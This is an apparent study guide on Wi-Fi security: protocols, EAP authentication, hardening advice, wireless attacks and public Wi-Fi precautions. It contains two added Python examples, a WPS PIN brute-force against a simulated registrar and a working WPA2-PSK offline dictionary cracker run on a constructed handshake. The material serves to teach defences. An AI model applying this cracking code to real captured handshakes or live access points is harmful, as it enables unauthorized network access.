Wi-Fi Security Protocols
WEP (Wired Equivalent Privacy): the original 802.11 security standard, part of the 1997 specification. Uses the RC4 stream cipher with a 40-bit or 104-bit key (marketed as 64-bit and 128-bit, counting the 24-bit IV). Thoroughly broken: an attacker can recover the WEP key in minutes from captured traffic. Never use WEP.
WPA (Wi-Fi Protected Access): interim replacement for WEP that ran on existing hardware. Uses TKIP (Temporal Key Integrity Protocol), which keeps RC4 but adds per-packet key mixing and a message integrity check. Also broken and deprecated; do not use.
WPA2: uses AES-CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol). Much stronger than WEP/WPA, provided TKIP is disabled rather than left on for old clients. Two modes: Personal (WPA2-PSK, one pre-shared key; home/small business) and Enterprise (802.1X, individual authentication per user; corporate).
WPA3: current standard. Personal mode replaces the PSK handshake with SAE (Simultaneous Authentication of Equals), a password-authenticated key exchange: a captured exchange cannot be used for an offline dictionary attack, so even a weak password can only be guessed online, one attempt per connection attempt. Enterprise mode optionally offers a 192-bit security suite. PMF (Protected Management Frames, 802.11w) is mandatory in WPA3 and blocks forged deauthentication frames. Two related Wi-Fi Alliance programs launched alongside WPA3: Easy Connect (DPP, QR-code-based device onboarding) and Enhanced Open (OWE, encryption on open networks without a password).
Authentication Methods
WPA2/WPA3 Personal (PSK): one shared password for all devices. Easy to set up, but a compromised password exposes every device, and on WPA2 anyone who knows the PSK and observes another client's 4-way handshake can decrypt that client's traffic.
WPA2/WPA3 Enterprise (802.1X): each user authenticates individually against a RADIUS server. Credentials: username/password, certificates, or smart cards. Keys are per session and per user, so one compromised credential can be revoked without rekeying the whole network.
RADIUS (Remote Authentication Dial-In User Service): centralized authentication server for network access. The AP acts as a RADIUS client and relays the client's EAP messages to it.
EAP (Extensible Authentication Protocol): framework that carries an authentication method over network access (EAPOL on the wireless link, RADIUS between AP and server).
EAP variants: EAP-TLS (mutual certificate authentication, the strongest option), PEAP (Protected EAP: wraps an inner method, commonly MSCHAPv2, in a TLS tunnel to the server), EAP-TTLS (similar to PEAP; the inner method can be PAP, CHAP or MSCHAPv2). For PEAP and EAP-TTLS the security rests on the client validating the server certificate (trusted CA and expected server name); a client that skips validation will hand its password or MSCHAPv2 hash to any rogue AP that answers.
802.1X port authentication: network access is gated at the switch port or AP. Until authentication succeeds only EAPOL frames are forwarded, so a device that is physically connected still cannot reach the network.
Captive portal: web-based sign-in page for guest networks. It controls access, not confidentiality; traffic on an open guest network is still visible to others unless OWE or a VPN is used.
Wireless Security Best Practices
Change the default SSID and admin credentials on the wireless router/AP: default credentials are publicly documented and tried by automated scanners.
Use WPA3 if supported; WPA2-AES (CCMP) as the minimum. Disable WEP and WPA/TKIP entirely, including "mixed" WPA/WPA2 modes that keep TKIP enabled for old clients.
MAC address filtering: only allow known device MAC addresses. Not a strong control (MAC addresses are sent in the clear and can be spoofed), but it adds a layer against casual connections.
Hidden SSID (disable SSID broadcast): the SSID still appears in probe and association frames, and clients configured for a hidden network probe for it wherever they go, which leaks the SSID. Security through obscurity, not real security; at most it reduces casual detection.
Enable the firewall on the router: blocks unsolicited inbound connections from the internet.
Disable WPS (Wi-Fi Protected Setup): the PIN method can be brute-forced in hours (WPS PIN attack), so the convenience is not worth it.
Enable the host firewall on individual computers too.
Use a separate guest network for visitors, isolated from the corporate/home network (separate VLAN, client isolation).
Update router/AP firmware regularly; old firmware ships known, exploitable bugs.
Position access points and tune transmit power to minimize signal outside the building (RF leakage).
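The reason the WPS PIN advice above matters is the structure of the PIN check itself, which the Wireless Attacks section also describes. The following added example (not code from the original page) implements the WPS checksum digit and a simulated registrar that, like a real AP, answers whether the first four digits are correct before the rest is examined; the PIN values and the registrar class are constructed for illustration.

```python
"""Added example, not code from the original page: why the WPS PIN method
is brute-forceable. The registrar is simulated here; no real AP is involved."""


def wps_checksum(first7: int) -> int:
    """Checksum digit over the first seven PIN digits (Luhn-style: digits in
    odd positions from the left are weighted 3, even positions weighted 1)."""
    accum = 0
    pin = first7
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True when the 8-digit PIN's last digit is the correct checksum."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


class SimulatedRegistrar:
    """Constructed stand-in for an AP's WPS registrar. It models the protocol
    flaw: the responses reveal whether the first four digits are right before
    the last four are ever checked."""

    def __init__(self, pin: str):
        assert is_valid_pin(pin)
        self._pin = pin
        self.attempts = 0

    def first_half_ok(self, first4: str) -> bool:
        self.attempts += 1
        return first4 == self._pin[:4]

    def second_half_ok(self, first4: str, last4: str) -> bool:
        self.attempts += 1
        return first4 + last4 == self._pin


def brute_force(reg: SimulatedRegistrar):
    """Two independent searches: 10^4 for the first half, then 10^3 for the
    second half (its last digit is the checksum), so at most 11,000 attempts
    instead of the 10^7 a single-shot check would need."""
    first4 = None
    for a in range(10_000):
        cand = f"{a:04d}"
        if reg.first_half_ok(cand):
            first4 = cand
            break
    if first4 is None:
        return None
    for b in range(1_000):
        last3 = f"{b:03d}"
        last4 = last3 + str(wps_checksum(int(first4 + last3)))
        if reg.second_half_ok(first4, last4):
            return first4 + last4
    return None


def search_space(split: bool) -> int:
    """Candidate count: the checksum alone leaves 10^7; the split check leaves 11,000."""
    return 10**4 + 10**3 if split else 10**7


if __name__ == "__main__":
    reg = SimulatedRegistrar("12345670")   # constructed PIN with a valid checksum
    print(brute_force(reg), "recovered after", reg.attempts, "attempts")
```

Real attacks are slower than this loop only because each attempt is a full WPS exchange with the AP and many APs rate-limit or lock after failures; the search space itself stays at 11,000, which is why disabling WPS is the only reliable fix.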
Wireless Attacks
Evil twin attack: the attacker sets up a rogue AP with the same SSID as a legitimate network, usually with a stronger signal. Users connect without realizing they are on the attacker's network, giving the attacker a MitM position. Prevention: 802.1X with clients that validate the RADIUS server certificate (the rogue cannot present a certificate the client trusts, so authentication fails before any credential leaves the client; with EAP-TLS there is no password to steal at all). WPA3 SAE: each side proves knowledge of the password without transmitting it and the exchange is useless for offline cracking, so an evil twin that does not know the password can neither complete the handshake nor harvest crackable material.
Deauthentication attack: the attacker sends forged 802.11 deauth frames, which are unauthenticated on networks without 802.11w, to disconnect clients from the legitimate AP. Clients reconnect automatically, and the attacker captures the WPA2 4-way handshake, which contains everything needed for an offline dictionary attack on the PSK. Prevention: PMF (802.11w) authenticates management frames so forged deauths are ignored; it is mandatory in WPA3 and optional in WPA2. WPA3 SAE additionally removes the offline-crackable handshake.
WPS PIN brute force: the 8-digit PIN is validated in two halves (first four digits, then the remaining three plus a checksum digit), so the search space collapses from 10^8 to at most 11,000 attempts. Can be cracked in hours. Prevention: disable WPS.
Wardriving: driving through an area while scanning for Wi-Fi networks and logging them; used to find unsecured or weakly secured networks.
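The deauthentication attack above and the PSK discussion under Authentication Methods both rest on the same fact: with WPA2-PSK, everything in the 4-way handshake except the passphrase is sent in the clear, so each candidate password can be checked offline. The following added example (not code from the original page) implements the WPA2-PSK key schedule as specified in IEEE 802.11i and runs a dictionary attack against a handshake that the block constructs itself; the SSID, MAC addresses, nonces, EAPOL skeleton and wordlist are all constructed for illustration, not captured from any network.

```python
"""Added example, not code from the original page: the WPA2-PSK key schedule
(IEEE 802.11i) that turns a captured 4-way handshake into an offline password
check. Every value in SAMPLE_HANDSHAKE is constructed here for illustration."""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Optional


@dataclass
class Handshake:
    ssid: str
    ap_mac: bytes      # AA: authenticator (AP) address
    sta_mac: bytes     # SPA: supplicant (client) address
    anonce: bytes      # from message 1
    snonce: bytes      # from message 2
    eapol: bytes       # EAPOL-Key message 2 with its MIC field zeroed
    mic: bytes         # the 16-byte MIC that was sent in message 2


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    This is the expensive step per guess; the SSID acts as the salt."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK (384 bits for CCMP: KCK | KEK | TK) from the PMK plus the two MAC
    addresses and two nonces, all of which cross the air in the clear."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame)[:16]."""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_psk(hs: Handshake, wordlist) -> Optional[str]:
    """Offline dictionary attack: one PBKDF2 + PRF + HMAC per candidate and no
    interaction with the AP. Returns the passphrase or None if not in the list."""
    for candidate in wordlist:
        pmk = derive_pmk(candidate, hs.ssid)
        kck = derive_ptk(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, hs.eapol), hs.mic):
            return candidate
    return None


def build_handshake(passphrase: str) -> Handshake:
    """Constructed message 2 as a client would produce it; exists only to
    generate test material for crack_psk."""
    ssid = "HomeNet"                        # constructed SSID
    ap_mac = bytes.fromhex("020000000001")  # constructed, locally administered MACs
    sta_mac = bytes.fromhex("020000000002")
    anonce = bytes(range(32))               # constructed nonces, fixed for reproducibility
    snonce = bytes(range(32, 64))
    # EAPOL-Key skeleton: version, type, body length, descriptor type, key info,
    # key length, replay counter, SNonce, IV, RSC, ID, MIC (zeroed), key data length.
    eapol = (b"\x01\x03\x00\x5f\x02\x01\x0a\x00\x10" + b"\x00" * 7 + b"\x01"
             + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol, eapol_mic(kck, eapol))


SAMPLE_HANDSHAKE = build_handshake("sunflower42")   # constructed, passphrase is in WORDLIST
WORDLIST = ["password", "12345678", "letmein", "sunflower42", "admin123"]

if __name__ == "__main__":
    print("recovered PSK:", crack_psk(SAMPLE_HANDSHAKE, WORDLIST))
```

Two things follow directly from the code: the only per-network secret in the computation is the passphrase, so PSK strength is the entire defence once a handshake has been captured, and the 4096 PBKDF2 iterations bound the guess rate but do not stop a wordlist attack against a common password. SAE changes the protocol so that no equivalent offline check exists.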
Public Wi-Fi Security
Public Wi-Fi risks: on an open network traffic is visible to anyone in range (and on a shared WPA2-PSK network to anyone who knows the password), evil twin attacks, and captive portals that capture credentials.
Mitigation when using public Wi-Fi:
VPN: encrypts all traffic between the device and the VPN server, hiding it from other users on the network and from the AP operator (the VPN provider sees it instead, so choose one you trust).
Only use HTTPS websites and take certificate warnings seriously; a captive portal or evil twin intercepting TLS will trigger them.
Disable file and printer sharing: set the network to the Public profile in Windows network settings.
Turn off auto-connect to remembered networks: a rogue AP broadcasting a remembered SSID is otherwise joined automatically.
Use cellular data for sensitive operations when possible.
Mobile hotspot: create your own private Wi-Fi from a cellular connection; more secure than shared public Wi-Fi.
WPA3 Enhanced Open (OWE): even open (no password) networks encrypt traffic between client and AP, which stops passive sniffing by other users. It does not authenticate the AP, so the AP operator still sees all traffic and an evil twin is still possible.